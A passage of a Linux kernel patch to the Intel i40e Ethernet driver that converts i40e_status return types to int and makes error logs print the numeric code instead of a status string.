+-	u32 section_size = 0;
++	struct i40e_section_table *sec_tbl;
+ 	u32 offset = 0, info = 0;
++	u32 section_size = 0;
++	int status = 0;
+ 	u32 sec_off;
+ 	u32 i;
+ 
+@@ -5894,15 +5758,15 @@ i40e_write_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+  *
+  * Rolls back previously loaded package.
+  */
+-enum i40e_status_code
++int
+ i40e_rollback_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+ 		      u32 track_id)
+ {
+ 	struct i40e_profile_section_header *sec = NULL;
+-	i40e_status status = 0;
+ 	struct i40e_section_table *sec_tbl;
+ 	u32 offset = 0, info = 0;
+ 	u32 section_size = 0;
++	int status = 0;
+ 	u32 sec_off;
+ 	int i;
+ 
+@@ -5946,15 +5810,15 @@ i40e_rollback_profile(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+  *
+  * Register a profile to the list of loaded profiles.
+  */
+-enum i40e_status_code
++int
+ i40e_add_pinfo_to_list(struct i40e_hw *hw,
+ 		       struct i40e_profile_segment *profile,
+ 		       u8 *profile_info_sec, u32 track_id)
+ {
+-	i40e_status status = 0;
+ 	struct i40e_profile_section_header *sec = NULL;
+ 	struct i40e_profile_info *pinfo;
+ 	u32 offset = 0, info = 0;
++	int status = 0;
+ 
+ 	sec = (struct i40e_profile_section_header *)profile_info_sec;
+ 	sec->tbl_size = 1;
+@@ -5988,7 +5852,7 @@ i40e_add_pinfo_to_list(struct i40e_hw *hw,
+  * of the function.
+  *
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_add_cloud_filters(struct i40e_hw *hw, u16 seid,
+ 			  struct i40e_aqc_cloud_filters_element_data *filters,
+ 			  u8 filter_count)
+@@ -5996,8 +5860,8 @@ i40e_aq_add_cloud_filters(struct i40e_hw *hw, u16 seid,
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_remove_cloud_filters *cmd =
+ 	(struct i40e_aqc_add_remove_cloud_filters *)&desc.params.raw;
+-	enum i40e_status_code status;
+ 	u16 buff_len;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_add_cloud_filters);
+@@ -6025,7 +5889,7 @@ i40e_aq_add_cloud_filters(struct i40e_hw *hw, u16 seid,
+  * function.
+  *
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_add_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+ 			     struct i40e_aqc_cloud_filters_element_bb *filters,
+ 			     u8 filter_count)
+@@ -6033,8 +5897,8 @@ i40e_aq_add_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_remove_cloud_filters *cmd =
+ 	(struct i40e_aqc_add_remove_cloud_filters *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 buff_len;
++	int status;
+ 	int i;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+@@ -6082,7 +5946,7 @@ i40e_aq_add_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+  * of the function.
+  *
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_rem_cloud_filters(struct i40e_hw *hw, u16 seid,
+ 			  struct i40e_aqc_cloud_filters_element_data *filters,
+ 			  u8 filter_count)
+@@ -6090,8 +5954,8 @@ i40e_aq_rem_cloud_filters(struct i40e_hw *hw, u16 seid,
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_remove_cloud_filters *cmd =
+ 	(struct i40e_aqc_add_remove_cloud_filters *)&desc.params.raw;
+-	enum i40e_status_code status;
+ 	u16 buff_len;
++	int status;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+ 					  i40e_aqc_opc_remove_cloud_filters);
+@@ -6119,7 +5983,7 @@ i40e_aq_rem_cloud_filters(struct i40e_hw *hw, u16 seid,
+  * function.
+  *
+  **/
+-enum i40e_status_code
++int
+ i40e_aq_rem_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+ 			     struct i40e_aqc_cloud_filters_element_bb *filters,
+ 			     u8 filter_count)
+@@ -6127,8 +5991,8 @@ i40e_aq_rem_cloud_filters_bb(struct i40e_hw *hw, u16 seid,
+ 	struct i40e_aq_desc desc;
+ 	struct i40e_aqc_add_remove_cloud_filters *cmd =
+ 	(struct i40e_aqc_add_remove_cloud_filters *)&desc.params.raw;
+-	i40e_status status;
+ 	u16 buff_len;
++	int status;
+ 	int i;
+ 
+ 	i40e_fill_default_direct_cmd_desc(&desc,
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_dcb.c b/drivers/net/ethernet/intel/i40e/i40e_dcb.c
+index 673f341f4c0c1..90638b67f8dc8 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_dcb.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_dcb.c
+@@ -12,7 +12,7 @@
+  *
+  * Get the DCBX status from the Firmware
+  **/
+-i40e_status i40e_get_dcbx_status(struct i40e_hw *hw, u16 *status)
++int i40e_get_dcbx_status(struct i40e_hw *hw, u16 *status)
+ {
+ 	u32 reg;
+ 
+@@ -497,15 +497,15 @@ static void i40e_parse_org_tlv(struct i40e_lldp_org_tlv *tlv,
+  *
+  * Parse DCB configuration from the LLDPDU
+  **/
+-i40e_status i40e_lldp_to_dcb_config(u8 *lldpmib,
+-				    struct i40e_dcbx_config *dcbcfg)
++int i40e_lldp_to_dcb_config(u8 *lldpmib,
++			    struct i40e_dcbx_config *dcbcfg)
+ {
+-	i40e_status ret = 0;
+ 	struct i40e_lldp_org_tlv *tlv;
+-	u16 type;
+-	u16 length;
+ 	u16 typelength;
+ 	u16 offset = 0;
++	int ret = 0;
++	u16 length;
++	u16 type;
+ 
+ 	if (!lldpmib || !dcbcfg)
+ 		return I40E_ERR_PARAM;
+@@ -551,12 +551,12 @@ i40e_status i40e_lldp_to_dcb_config(u8 *lldpmib,
+  *
+  * Query DCB configuration from the Firmware
+  **/
+-i40e_status i40e_aq_get_dcb_config(struct i40e_hw *hw, u8 mib_type,
+-				   u8 bridgetype,
+-				   struct i40e_dcbx_config *dcbcfg)
++int i40e_aq_get_dcb_config(struct i40e_hw *hw, u8 mib_type,
++			   u8 bridgetype,
++			   struct i40e_dcbx_config *dcbcfg)
+ {
+-	i40e_status ret = 0;
+ 	struct i40e_virt_mem mem;
++	int ret = 0;
+ 	u8 *lldpmib;
+ 
+ 	/* Allocate the LLDPDU */
+@@ -767,9 +767,9 @@ static void i40e_cee_to_dcb_config(
+  *
+  * Get IEEE mode DCB configuration from the Firmware
+  **/
+-static i40e_status i40e_get_ieee_dcb_config(struct i40e_hw *hw)
++static int i40e_get_ieee_dcb_config(struct i40e_hw *hw)
+ {
+-	i40e_status ret = 0;
++	int ret = 0;
+ 
+ 	/* IEEE mode */
+ 	hw->local_dcbx_config.dcbx_mode = I40E_DCBX_MODE_IEEE;
+@@ -797,11 +797,11 @@ out:
+  *
+  * Get DCB configuration from the Firmware
+  **/
+-i40e_status i40e_get_dcb_config(struct i40e_hw *hw)
++int i40e_get_dcb_config(struct i40e_hw *hw)
+ {
+-	i40e_status ret = 0;
+-	struct i40e_aqc_get_cee_dcb_cfg_resp cee_cfg;
+ 	struct i40e_aqc_get_cee_dcb_cfg_v1_resp cee_v1_cfg;
++	struct i40e_aqc_get_cee_dcb_cfg_resp cee_cfg;
++	int ret = 0;
+ 
+ 	/* If Firmware version < v4.33 on X710/XL710, IEEE only */
+ 	if ((hw->mac.type == I40E_MAC_XL710) &&
+@@ -867,11 +867,11 @@ out:
+  *
+  * Update DCB configuration from the Firmware
+  **/
+-i40e_status i40e_init_dcb(struct i40e_hw *hw, bool enable_mib_change)
++int i40e_init_dcb(struct i40e_hw *hw, bool enable_mib_change)
+ {
+-	i40e_status ret = 0;
+ 	struct i40e_lldp_variables lldp_cfg;
+ 	u8 adminstatus = 0;
++	int ret = 0;
+ 
+ 	if (!hw->func_caps.dcb)
+ 		return I40E_NOT_SUPPORTED;
+@@ -940,13 +940,13 @@ i40e_status i40e_init_dcb(struct i40e_hw *hw, bool enable_mib_change)
+  * Get status of FW Link Layer Discovery Protocol (LLDP) Agent.
+  * Status of agent is reported via @lldp_status parameter.
+  **/
+-enum i40e_status_code
++int
+ i40e_get_fw_lldp_status(struct i40e_hw *hw,
+ 			enum i40e_get_fw_lldp_status_resp *lldp_status)
+ {
+ 	struct i40e_virt_mem mem;
+-	i40e_status ret;
+ 	u8 *lldpmib;
++	int ret;
+ 
+ 	if (!lldp_status)
+ 		return I40E_ERR_PARAM;
+@@ -1238,13 +1238,13 @@ static void i40e_add_dcb_tlv(struct i40e_lldp_org_tlv *tlv,
+  *
+  * Set DCB configuration to the Firmware
+  **/
+-i40e_status i40e_set_dcb_config(struct i40e_hw *hw)
++int i40e_set_dcb_config(struct i40e_hw *hw)
+ {
+ 	struct i40e_dcbx_config *dcbcfg;
+ 	struct i40e_virt_mem mem;
+ 	u8 mib_type, *lldpmib;
+-	i40e_status ret;
+ 	u16 miblen;
++	int ret;
+ 
+ 	/* update the hw local config */
+ 	dcbcfg = &hw->local_dcbx_config;
+@@ -1274,8 +1274,8 @@ i40e_status i40e_set_dcb_config(struct i40e_hw *hw)
+  *
+  * send DCB configuration to FW
+  **/
+-i40e_status i40e_dcb_config_to_lldp(u8 *lldpmib, u16 *miblen,
+-				    struct i40e_dcbx_config *dcbcfg)
++int i40e_dcb_config_to_lldp(u8 *lldpmib, u16 *miblen,
++			    struct i40e_dcbx_config *dcbcfg)
+ {
+ 	u16 length, offset = 0, tlvid, typelength;
+ 	struct i40e_lldp_org_tlv *tlv;
+@@ -1888,13 +1888,13 @@ void i40e_dcb_hw_rx_pb_config(struct i40e_hw *hw,
+  *
+  * Reads the LLDP configuration data from NVM using passed addresses
+  **/
+-static i40e_status _i40e_read_lldp_cfg(struct i40e_hw *hw,
+-				       struct i40e_lldp_variables *lldp_cfg,
+-				       u8 module, u32 word_offset)
++static int _i40e_read_lldp_cfg(struct i40e_hw *hw,
++			       struct i40e_lldp_variables *lldp_cfg,
++			       u8 module, u32 word_offset)
+ {
+ 	u32 address, offset = (2 * word_offset);
+-	i40e_status ret;
+ 	__le16 raw_mem;
++	int ret;
+ 	u16 mem;
+ 
+ 	ret = i40e_acquire_nvm(hw, I40E_RESOURCE_READ);
+@@ -1950,10 +1950,10 @@ err_lldp_cfg:
+  *
+  * Reads the LLDP configuration data from NVM
+  **/
+-i40e_status i40e_read_lldp_cfg(struct i40e_hw *hw,
+-			       struct i40e_lldp_variables *lldp_cfg)
++int i40e_read_lldp_cfg(struct i40e_hw *hw,
++		       struct i40e_lldp_variables *lldp_cfg)
+ {
+-	i40e_status ret = 0;
++	int ret = 0;
+ 	u32 mem;
+ 
+ 	if (!lldp_cfg)
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_dcb.h b/drivers/net/ethernet/intel/i40e/i40e_dcb.h
+index 2370ceecb0612..6b60dc9b77361 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_dcb.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_dcb.h
+@@ -264,20 +264,20 @@ void i40e_dcb_hw_calculate_pool_sizes(struct i40e_hw *hw,
+ void i40e_dcb_hw_rx_pb_config(struct i40e_hw *hw,
+ 			      struct i40e_rx_pb_config *old_pb_cfg,
+ 			      struct i40e_rx_pb_config *new_pb_cfg);
+-i40e_status i40e_get_dcbx_status(struct i40e_hw *hw,
+-				 u16 *status);
+-i40e_status i40e_lldp_to_dcb_config(u8 *lldpmib,
+-				    struct i40e_dcbx_config *dcbcfg);
+-i40e_status i40e_aq_get_dcb_config(struct i40e_hw *hw, u8 mib_type,
+-				   u8 bridgetype,
+-				   struct i40e_dcbx_config *dcbcfg);
+-i40e_status i40e_get_dcb_config(struct i40e_hw *hw);
+-i40e_status i40e_init_dcb(struct i40e_hw *hw,
+-			  bool enable_mib_change);
+-enum i40e_status_code
++int i40e_get_dcbx_status(struct i40e_hw *hw,
++			 u16 *status);
++int i40e_lldp_to_dcb_config(u8 *lldpmib,
++			    struct i40e_dcbx_config *dcbcfg);
++int i40e_aq_get_dcb_config(struct i40e_hw *hw, u8 mib_type,
++			   u8 bridgetype,
++			   struct i40e_dcbx_config *dcbcfg);
++int i40e_get_dcb_config(struct i40e_hw *hw);
++int i40e_init_dcb(struct i40e_hw *hw,
++		  bool enable_mib_change);
++int
+ i40e_get_fw_lldp_status(struct i40e_hw *hw,
+ 			enum i40e_get_fw_lldp_status_resp *lldp_status);
+-i40e_status i40e_set_dcb_config(struct i40e_hw *hw);
+-i40e_status i40e_dcb_config_to_lldp(u8 *lldpmib, u16 *miblen,
+-				    struct i40e_dcbx_config *dcbcfg);
++int i40e_set_dcb_config(struct i40e_hw *hw);
++int i40e_dcb_config_to_lldp(u8 *lldpmib, u16 *miblen,
++			    struct i40e_dcbx_config *dcbcfg);
+ #endif /* _I40E_DCB_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c b/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c
+index e32c61909b310..bba70bd5703bf 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_dcb_nl.c
+@@ -135,8 +135,8 @@ static int i40e_dcbnl_ieee_setets(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB ETS configuration err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Failed setting DCB ETS configuration err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -174,8 +174,8 @@ static int i40e_dcbnl_ieee_setpfc(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB PFC configuration err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Failed setting DCB PFC configuration err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -225,8 +225,8 @@ static int i40e_dcbnl_ieee_setapp(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB configuration err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Failed setting DCB configuration err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+@@ -290,8 +290,8 @@ static int i40e_dcbnl_ieee_delapp(struct net_device *netdev,
+ 	ret = i40e_hw_dcb_config(pf, &pf->tmp_cfg);
+ 	if (ret) {
+ 		dev_info(&pf->pdev->dev,
+-			 "Failed setting DCB configuration err %s aq_err %s\n",
+-			 i40e_stat_str(&pf->hw, ret),
++			 "Failed setting DCB configuration err %d aq_err %s\n",
++			 ret,
+ 			 i40e_aq_str(&pf->hw, pf->hw.aq.asq_last_status));
+ 		return -EINVAL;
+ 	}
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_ddp.c b/drivers/net/ethernet/intel/i40e/i40e_ddp.c
+index e1069ae658ad3..7e8183762fd95 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_ddp.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_ddp.c
+@@ -36,7 +36,7 @@ static int i40e_ddp_does_profile_exist(struct i40e_hw *hw,
+ {
+ 	struct i40e_ddp_profile_list *profile_list;
+ 	u8 buff[I40E_PROFILE_LIST_SIZE];
+-	i40e_status status;
++	int status;
+ 	int i;
+ 
+ 	status = i40e_aq_get_ddp_list(hw, buff, I40E_PROFILE_LIST_SIZE, 0,
+@@ -91,7 +91,7 @@ static int i40e_ddp_does_profile_overlap(struct i40e_hw *hw,
+ {
+ 	struct i40e_ddp_profile_list *profile_list;
+ 	u8 buff[I40E_PROFILE_LIST_SIZE];
+-	i40e_status status;
++	int status;
+ 	int i;
+ 
+ 	status = i40e_aq_get_ddp_list(hw, buff, I40E_PROFILE_LIST_SIZE, 0,
+@@ -117,14 +117,14 @@ static int i40e_ddp_does_profile_overlap(struct i40e_hw *hw,
+  *
+  * Register a profile to the list of loaded profiles.
+  */
+-static enum i40e_status_code
++static int
+ i40e_add_pinfo(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+ 	       u8 *profile_info_sec, u32 track_id)
+ {
+ 	struct i40e_profile_section_header *sec;
+ 	struct i40e_profile_info *pinfo;
+-	i40e_status status;
+ 	u32 offset = 0, info = 0;
++	int status;
+ 
+ 	sec = (struct i40e_profile_section_header *)profile_info_sec;
+ 	sec->tbl_size = 1;
+@@ -157,14 +157,14 @@ i40e_add_pinfo(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+  *
+  * Removes DDP profile from the NIC.
+  **/
+-static enum i40e_status_code
++static int
+ i40e_del_pinfo(struct i40e_hw *hw, struct i40e_profile_segment *profile,
+ 	       u8 *profile_info_sec, u32 track_id)
+ {
+ 	struct i40e_profile_section_header *sec;
+ 	struct i40e_profile_info *pinfo;
+-	i40e_status status;
+ 	u32 offset = 0, info = 0;
++	int status;
+ 
+ 	sec = (struct i40e_profile_section_header *)profile_info_sec;
+ 	sec->tbl_size = 1;
+@@ -270,12 +270,12 @@ int i40e_ddp_load(struct net_device *netdev, const u8 *data, size_t size,
+ 	struct i40e_profile_segment *profile_hdr;
+ 	struct i40e_profile_info pinfo;
+ 	struct i40e_package_header *pkg_hdr;
+-	i40e_status status;
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_vsi *vsi = np->vsi;
+ 	struct i40e_pf *pf = vsi->back;
+ 	u32 track_id;
+ 	int istatus;
++	int status;
+ 
+ 	pkg_hdr = (struct i40e_package_header *)data;
+ 	if (!i40e_ddp_is_pkg_hdr_valid(netdev, pkg_hdr, size))
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_debugfs.c b/drivers/net/ethernet/intel/i40e/i40e_debugfs.c
+index c9dcd6d92c832..9954493cd4489 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_debugfs.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_debugfs.c
+@@ -918,9 +918,9 @@ static ssize_t i40e_dbg_command_write(struct file *filp,
+ 		dev_info(&pf->pdev->dev, "deleting relay %d\n", veb_seid);
+ 		i40e_veb_release(pf->veb[i]);
+ 	} else if (strncmp(cmd_buf, "add pvid", 8) == 0) {
+-		i40e_status ret;
+-		u16 vid;
+ 		unsigned int v;
++		int ret;
++		u16 vid;
+ 
+ 		cnt = sscanf(&cmd_buf[8], "%i %u", &vsi_seid, &v);
+ 		if (cnt != 2) {
+@@ -1284,7 +1284,7 @@ static ssize_t i40e_dbg_command_write(struct file *filp,
+ 		}
+ 	} else if (strncmp(cmd_buf, "send aq_cmd", 11) == 0) {
+ 		struct i40e_aq_desc *desc;
+-		i40e_status ret;
++		int ret;
+ 
+ 		desc = kzalloc(sizeof(struct i40e_aq_desc), GFP_KERNEL);
+ 		if (!desc)
+@@ -1330,9 +1330,9 @@ static ssize_t i40e_dbg_command_write(struct file *filp,
+ 		desc = NULL;
+ 	} else if (strncmp(cmd_buf, "send indirect aq_cmd", 20) == 0) {
+ 		struct i40e_aq_desc *desc;
+-		i40e_status ret;
+ 		u16 buffer_len;
+ 		u8 *buff;
++		int ret;
+ 
+ 		desc = kzalloc(sizeof(struct i40e_aq_desc), GFP_KERNEL);
+ 		if (!desc)
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_diag.c b/drivers/net/ethernet/intel/i40e/i40e_diag.c
+index ca229b0efeb65..97fe1787a8f4a 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_diag.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_diag.c
+@@ -10,8 +10,8 @@
+  * @reg: reg to be tested
+  * @mask: bits to be touched
+  **/
+-static i40e_status i40e_diag_reg_pattern_test(struct i40e_hw *hw,
+-							u32 reg, u32 mask)
++static int i40e_diag_reg_pattern_test(struct i40e_hw *hw,
++				      u32 reg, u32 mask)
+ {
+ 	static const u32 patterns[] = {
+ 		0x5A5A5A5A, 0xA5A5A5A5, 0x00000000, 0xFFFFFFFF
+@@ -74,9 +74,9 @@ const struct i40e_diag_reg_test_info i40e_reg_list[] = {
+  *
+  * Perform registers diagnostic test
+  **/
+-i40e_status i40e_diag_reg_test(struct i40e_hw *hw)
++int i40e_diag_reg_test(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u32 reg, mask;
+ 	u32 elements;
+ 	u32 i, j;
+@@ -115,9 +115,9 @@ i40e_status i40e_diag_reg_test(struct i40e_hw *hw)
+  *
+  * Perform EEPROM diagnostic test
+  **/
+-i40e_status i40e_diag_eeprom_test(struct i40e_hw *hw)
++int i40e_diag_eeprom_test(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
++	int ret_code;
+ 	u16 reg_val;
+ 
+ 	/* read NVM control word and if NVM valid, validate EEPROM checksum*/
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_diag.h b/drivers/net/ethernet/intel/i40e/i40e_diag.h
+index 1db7c6d572311..c3ce5f35211f0 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_diag.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_diag.h
+@@ -22,7 +22,7 @@ struct i40e_diag_reg_test_info {
+ 
+ extern const struct i40e_diag_reg_test_info i40e_reg_list[];
+ 
+-i40e_status i40e_diag_reg_test(struct i40e_hw *hw);
+-i40e_status i40e_diag_eeprom_test(struct i40e_hw *hw);
++int i40e_diag_reg_test(struct i40e_hw *hw);
++int i40e_diag_eeprom_test(struct i40e_hw *hw);
+ 
+ #endif /* _I40E_DIAG_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c
+index 887a735fe2a7b..04cbc217c569b 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c
+@@ -1226,8 +1226,8 @@ static int i40e_set_link_ksettings(struct net_device *netdev,
+ 	struct i40e_vsi *vsi = np->vsi;
+ 	struct i40e_hw *hw = &pf->hw;
+ 	bool autoneg_changed = false;
+-	i40e_status status = 0;
+ 	int timeout = 50;
++	int status = 0;
+ 	int err = 0;
+ 	__u32 speed;
+ 	u8 autoneg;
+@@ -1455,8 +1455,8 @@ static int i40e_set_link_ksettings(struct net_device *netdev,
+ 		status = i40e_aq_set_phy_config(hw, &config, NULL);
+ 		if (status) {
+ 			netdev_info(netdev,
+-				    "Set phy config failed, err %s aq_err %s\n",
+-				    i40e_stat_str(hw, status),
++				    "Set phy config failed, err %d aq_err %s\n",
++				    status,
+ 				    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			err = -EAGAIN;
+ 			goto done;
+@@ -1465,8 +1465,8 @@ static int i40e_set_link_ksettings(struct net_device *netdev,
+ 		status = i40e_update_link_info(hw);
+ 		if (status)
+ 			netdev_dbg(netdev,
+-				   "Updating link info failed with err %s aq_err %s\n",
+-				   i40e_stat_str(hw, status),
++				   "Updating link info failed with err %d aq_err %s\n",
++				   status,
+ 				   i40e_aq_str(hw, hw->aq.asq_last_status));
+ 
+ 	} else {
+@@ -1485,7 +1485,7 @@ static int i40e_set_fec_cfg(struct net_device *netdev, u8 fec_cfg)
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+ 	struct i40e_pf *pf = np->vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status status = 0;
++	int status = 0;
+ 	u32 flags = 0;
+ 	int err = 0;
+ 
+@@ -1517,8 +1517,8 @@ static int i40e_set_fec_cfg(struct net_device *netdev, u8 fec_cfg)
+ 		status = i40e_aq_set_phy_config(hw, &config, NULL);
+ 		if (status) {
+ 			netdev_info(netdev,
+-				    "Set phy config failed, err %s aq_err %s\n",
+-				    i40e_stat_str(hw, status),
++				    "Set phy config failed, err %d aq_err %s\n",
++				    status,
+ 				    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			err = -EAGAIN;
+ 			goto done;
+@@ -1531,8 +1531,8 @@ static int i40e_set_fec_cfg(struct net_device *netdev, u8 fec_cfg)
+ 			 * (e.g. no physical connection etc.)
+ 			 */
+ 			netdev_dbg(netdev,
+-				   "Updating link info failed with err %s aq_err %s\n",
+-				   i40e_stat_str(hw, status),
++				   "Updating link info failed with err %d aq_err %s\n",
++				   status,
+ 				   i40e_aq_str(hw, hw->aq.asq_last_status));
+ 	}
+ 
+@@ -1547,7 +1547,7 @@ static int i40e_get_fec_param(struct net_device *netdev,
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+ 	struct i40e_pf *pf = np->vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status status = 0;
++	int status = 0;
+ 	int err = 0;
+ 	u8 fec_cfg;
+ 
+@@ -1634,12 +1634,12 @@ static int i40e_nway_reset(struct net_device *netdev)
+ 	struct i40e_pf *pf = np->vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+ 	bool link_up = hw->phy.link_info.link_info & I40E_AQ_LINK_UP;
+-	i40e_status ret = 0;
++	int ret = 0;
+ 
+ 	ret = i40e_aq_set_link_restart_an(hw, link_up, NULL);
+ 	if (ret) {
+-		netdev_info(netdev, "link restart failed, err %s aq_err %s\n",
+-			    i40e_stat_str(hw, ret),
++		netdev_info(netdev, "link restart failed, err %d aq_err %s\n",
++			    ret,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return -EIO;
+ 	}
+@@ -1699,9 +1699,9 @@ static int i40e_set_pauseparam(struct net_device *netdev,
+ 	struct i40e_link_status *hw_link_info = &hw->phy.link_info;
+ 	struct i40e_dcbx_config *dcbx_cfg = &hw->local_dcbx_config;
+ 	bool link_up = hw_link_info->link_info & I40E_AQ_LINK_UP;
+-	i40e_status status;
+ 	u8 aq_failures;
+ 	int err = 0;
++	int status;
+ 	u32 is_an;
+ 
+ 	/* Changing the port's flow control is not supported if this isn't the
+@@ -1755,20 +1755,20 @@ static int i40e_set_pauseparam(struct net_device *netdev,
+ 	status = i40e_set_fc(hw, &aq_failures, link_up);
+ 
+ 	if (aq_failures & I40E_SET_FC_AQ_FAIL_GET) {
+-		netdev_info(netdev, "Set fc failed on the get_phy_capabilities call with err %s aq_err %s\n",
+-			    i40e_stat_str(hw, status),
++		netdev_info(netdev, "Set fc failed on the get_phy_capabilities call with err %d aq_err %s\n",
++			    status,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		err = -EAGAIN;
+ 	}
+ 	if (aq_failures & I40E_SET_FC_AQ_FAIL_SET) {
+-		netdev_info(netdev, "Set fc failed on the set_phy_config call with err %s aq_err %s\n",
+-			    i40e_stat_str(hw, status),
++		netdev_info(netdev, "Set fc failed on the set_phy_config call with err %d aq_err %s\n",
++			    status,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		err = -EAGAIN;
+ 	}
+ 	if (aq_failures & I40E_SET_FC_AQ_FAIL_UPDATE) {
+-		netdev_info(netdev, "Set fc failed on the get_link_info call with err %s aq_err %s\n",
+-			    i40e_stat_str(hw, status),
++		netdev_info(netdev, "Set fc failed on the get_link_info call with err %d aq_err %s\n",
++			    status,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		err = -EAGAIN;
+ 	}
+@@ -2583,8 +2583,8 @@ static u64 i40e_link_test(struct net_device *netdev, u64 *data)
+ {
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_pf *pf = np->vsi->back;
+-	i40e_status status;
+ 	bool link_up = false;
++	int status;
+ 
+ 	netif_info(pf, hw, netdev, "link test\n");
+ 	status = i40e_get_link_status(&pf->hw, &link_up);
+@@ -2807,11 +2807,11 @@ static int i40e_set_phys_id(struct net_device *netdev,
+ 			    enum ethtool_phys_id_state state)
+ {
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+-	i40e_status ret = 0;
+ 	struct i40e_pf *pf = np->vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+ 	int blink_freq = 2;
+ 	u16 temp_status;
++	int ret = 0;
+ 
+ 	switch (state) {
+ 	case ETHTOOL_ID_ACTIVE:
+@@ -5247,7 +5247,7 @@ static int i40e_set_priv_flags(struct net_device *dev, u32 flags)
+ 	struct i40e_vsi *vsi = np->vsi;
+ 	struct i40e_pf *pf = vsi->back;
+ 	u32 reset_needed = 0;
+-	i40e_status status;
++	int status;
+ 	u32 i, j;
+ 
+ 	orig_flags = READ_ONCE(pf->flags);
+@@ -5362,8 +5362,8 @@ flags_complete:
+ 						0, NULL);
+ 		if (ret && pf->hw.aq.asq_last_status != I40E_AQ_RC_ESRCH) {
+ 			dev_info(&pf->pdev->dev,
+-				 "couldn't set switch config bits, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "couldn't set switch config bits, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			/* not a fatal problem, just keep going */
+@@ -5435,9 +5435,8 @@ flags_complete:
+ 					return -EBUSY;
+ 				default:
+ 					dev_warn(&pf->pdev->dev,
+-						 "Starting FW LLDP agent failed: error: %s, %s\n",
+-						 i40e_stat_str(&pf->hw,
+-							       status),
